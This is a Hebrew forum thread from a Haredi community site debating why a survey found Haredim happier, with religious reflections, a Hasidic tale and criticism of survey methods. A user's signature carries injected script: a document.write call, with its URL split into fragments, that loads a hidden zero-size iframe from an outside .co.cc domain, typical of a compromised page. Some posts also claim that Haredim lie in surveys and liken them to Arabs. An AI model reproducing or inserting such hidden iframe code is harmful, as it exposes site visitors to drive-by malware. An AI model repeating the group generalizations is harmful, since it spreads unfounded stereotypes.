בית פורומים עצור כאן חושבים

מדוע החרדים מאושרים יותר?

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-2/7/2018 22:21 לינק ישיר 

ההלכה - חייב אדם לברך על הרע כשם שהוא מברך על הטוב. אז מה קורה לסוקר השואל את החרדי מה שלומך? בכל מקרה הוא יגיד ב''ה

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 07:22 לינק ישיר 

הרעיונות המגוחכים העולים כאן כדי להסביר את הסקר ה'כ"כ מלחיץ', רק מראים עד כמה אין כאן אפילו אדם אחד שבאמת מכיר את החברה החרדית, וכולם כאן הפכו לראות את העולם דרך חור המנעול המצומצם והאינפנטילי של צענערענע. 

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 07:40 לינק ישיר 

נישטאיך כתב:
האם ייתכן שהסיבה לתוחלת החיים הגבהה יותר של החרדים, הוא האושר בלימוד הגמרא?

תוקן על ידי נישטאיך ב- 02/07/2018 17:30:29

[נישט,

נניח שזה נכון (ואני יכולה להעיד, שלימוד אכן יכול לתרום רבות לאושרו של אדם) - אבל הרי פחות מ 50% מן החרדים לומדים גמרא...]

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 08:03 לינק ישיר 

לעיל כבר ציינתי שהאיפיון של "אושר" אינו חד משמעי וההסתמכות על תשובה לסקר כמדד לאושר אישי גם היא מעוררת קשיים.

כלומר, איקון ירוק למואדיב.

ראויים לעיון דברי ת"ט וירוחם. זה נשמע כאילו ירוחם כותב, אולי, בציניות, אבל דבריו נכונים. מי שחי עם מודעות לכך שהחיים וכל מה שיש הם מתנה, יוכל להעריך יותר את מה שיש.

זו כמובן הפשטה ואי אפשר להסתמך רק עליה. האם אדם אינו עלול להגיע לקריעה נפשית בגלל שמצד אחד הוא חייב "לברך על הרעה" ומצד שני הוא ער למצוקות וייסורים בחייו? יש כאלו, כמו בסיפור על אותו אדמור, שיאמרו כי "איך אפשר לברך על הרעה" כאשר הכל חסד. אבל הם, כמדומה, המיעוט. גם אם מחנכים את הדור הצעיר שלנו על סמך הסיפור הזה.

זו נקודה חשובה (לא אכתוב שהיא היחידה כזו, זה לא נכון). החיים שלנו מלאים בכל הסוגים של אירועים והתמודדויות. לכן כאשר אדם מסתכל על חייו יש לו סיבה טובה להיות מאושר, חלק מהזמן, ולהיות בסבל וצער, חלק מהזמן. כאשר אדם מתבקש להתבונן בסך הכל, התשובה: "אני מאושר"או "אני סובל" שתיהן באות בחשבון. ההצבעה על אחת מהן היא ענין של הכרעה וחינוך. אבל היא גם משקפת בחירה, עד כמה שזה בידנו, לבחור להיות מאושרים. למעשה, לא צריך להיות דתי או חרדי כדי לבחור את ההסתכלות השמחה יותר. אבל מסתבר שהחינוך החרדי תורם לזה.

אז כן, החינוך החרדי מעניק לנו מבט שמח ומאושר על החיים. נקודה של זכות.

כל הניתוח הקצרצר הזה שלי גם אומר משהו על טיב שאלה מסכמת קצרצרה: האם אתה מאושר? איך אפשר לצפות לתשובה משמעותית על השאלה הזו? לכל הפחות היה צריך לומר: בהסתכלות על חייך, מה חשוב יותר ומה בולט יותר, האושר או הצער? ההצלחות או האכזבות? האם אתה חש וחושב שהמסלול שלך מסייע לך להיות מאושר יותר?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 10:18 לינק ישיר 

בתוך עמי אני חי- להגיד שהחברה חרדית מאושרת?   

אבל סיפור מזמן לא סיפרתי. בבית מדרשו של רבי אלימלך  היה יהודי בשם זושא. כל הימים היה שוכב ליד התנור שלא יקפא, כי בגדים ונעלים לא היו לו. גופו הרזה מרעב היה מכוסה בכויות קור. שכב על יד התנור והתחמם.

נכנס יהודי לבית המדרש ושאל מי כאן זושאן מי כאן זושא? 
ניגש אליו זושא  ושאל מה תבקש?
ענה היהודי - שאלתי את הרבי, איך אפשר לברך על הרע כשם שמברכים על הטוב?
אמר לי הרבי לשאול אותך.
אמר זושא אני לא מבין את הרבי- איך אני יכול לענות לך? הרי לי מעולם לא היה רע?

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 10:27 לינק ישיר 
מואדיב

מיימוני כתב:
לעיל כבר ציינתי שהאיפיון של "אושר" אינו חד משמעי וההסתמכות על תשובה לסקר כמדד לאושר אישי גם היא מעוררת קשיים.

כלומר, איקון ירוק למואדיב.

ראויים לעיון דברי ת"ט וירוחם. זה נשמע כאילו ירוחם כותב, אולי, בציניות, אבל דבריו נכונים. מי שחי עם מודעות לכך שהחיים וכל מה שיש הם מתנה, יוכל להעריך יותר את מה שיש.

זו כמובן הפשטה ואי אפשר להסתמך רק עליה. האם אדם אינו עלול להגיע לקריעה נפשית בגלל שמצד אחד הוא חייב "לברך על הרעה" ומצד שני הוא ער למצוקות וייסורים בחייו? יש כאלו, כמו בסיפור על אותו אדמור, שיאמרו כי "איך אפשר לברך על הרעה" כאשר הכל חסד. אבל הם, כמדומה, המיעוט. גם אם מחנכים את הדור הצעיר שלנו על סמך הסיפור הזה.

זו נקודה חשובה (לא אכתוב שהיא היחידה כזו, זה לא נכון). החיים שלנו מלאים בכל הסוגים של אירועים והתמודדויות. לכן כאשר אדם מסתכל על חייו יש לו סיבה טובה להיות מאושר, חלק מהזמן, ולהיות בסבל וצער, חלק מהזמן. כאשר אדם מתבקש להתבונן בסך הכל, התשובה: "אני מאושר"או "אני סובל" שתיהן באות בחשבון. ההצבעה על אחת מהן היא ענין של הכרעה וחינוך. אבל היא גם משקפת בחירה, עד כמה שזה בידנו, לבחור להיות מאושרים. למעשה, לא צריך להיות דתי או חרדי כדי לבחור את ההסתכלות השמחה יותר. אבל מסתבר שהחינוך החרדי תורם לזה.

אז כן, החינוך החרדי מעניק לנו מבט שמח ומאושר על החיים. נקודה של זכות.

כל הניתוח הקצרצר הזה שלי גם אומר משהו על טיב שאלה מסכמת קצרצרה: האם אתה מאושר? איך אפשר לצפות לתשובה משמעותית על השאלה הזו? לכל הפחות היה צריך לומר: בהסתכלות על חייך, מה חשוב יותר ומה בולט יותר, האושר או הצער? ההצלחות או האכזבות? האם אתה חש וחושב שהמסלול שלך מסייע לך להיות מאושר יותר?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

כאמור, יש לי ביקורת רבה על המתודולוגיה של הלמ"ס, אך לא צריך להגזים. הם לא שאלו רק "שאלה מסכמת קצרצרה". גם בשאלות יותר ספציפיות, כמו מידת שביעות הרצון מהבריאות הגופנית, יש פערים גדולים מאד בתוצאות בין חרדים לבין אחרים.

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 11:38 לינק ישיר 
ירוחםשם

אמשלום כתב:

[נישט,

נניח שזה נכון (ואני יכולה להעיד, שלימוד אכן יכול לתרום רבות לאושרו של אדם) - אבל הרי פחות מ 50% מן החרדים לומדים גמרא...]

תוקן על ידי ירוחםשמ ב- 03/07/2018 11:39:39

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 11:41 לינק ישיר 
ירוחםשם

ירוחםשמ כתב:

[נישט,

תוקן על ידי ירוחםשמ ב- 03/07/2018 11:39:39

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 15:20 לינק ישיר 

מואדיב

לא ראיתי - וזה מחדל מצידי.

ירוחם

לסיפור הזה נתכוונתי!

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 16:02 לינק ישיר 

ברוך שכיונתי לדעת גדולים

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 16:56 לינק ישיר 

בכל הסקרים (כולל סקרי הבחירות) מתגלה שהחרדים נוטים לשקר לכן זה מגוחך להתייחס לסקר הזה.
באופן כללי את הליכלוך הם נוטים לשים מתחת לשטיח יותר מכל מגזר אחר.

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 17:39 לינק ישיר 

בנושא של הסקרים (כמו בעוד נושאים) החרדים מתנהגים כמו הערבים: 

" אנחנו מיוחדים בהיבט האוכלוסייה. למשל הקהל החרדי שבאופן מסורתי לא משתף פעולה עם סקרים ולעתים גם משקר בהם, כי הסוקר מייצג בעבורו את הממסד והוא 'משחק' איתו. כנ"ל לגבי המגזר הערבי שלא משתף פעולה עם סקרים בעברית. מדובר במגזרים שכוללים עשרות אחוזים מהאוכלוסייה."

https://bit.ly/2u0eftO

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 18:01 לינק ישיר 

אפרים

לנהוג כמו הערבים בדבר אחד, או אפילו כמה אם תמצא, לא הופך את החרדים לערבים. למה כתבתי להדגיש את זה? מפני שכתבת "החרדים מתנהגים כמו הערבים". זה נכון לגבי פרט זה. וגם כאן יתכן שהסיבות שונות. גם המגזר החרדי וגם להבדיל הערבי שניהם אינם מזדהים במאה אחוזים עם הרוב של התושבים. אבל הם נמצאים בקצוות שונים שלו...

ירוחם

איקון מחייך

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 18:07 לינק ישיר 

אמשלום. אולי היא הסיבה ש"החרדים מאושרים יותר", ולא "שכל החרדים מאושרים".

תוקן על ידי נישטאיך ב- 03/07/2018 18:19:34

דדווח על תוכן פוגעני

נשלח ב-3/7/2018 18:17 לינק ישיר 

תוקן על ידי נישטאיך ב- 03/07/2018 18:29:43

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > מדוע החרדים מאושרים יותר?
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 לדף הבא סך הכל 4 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.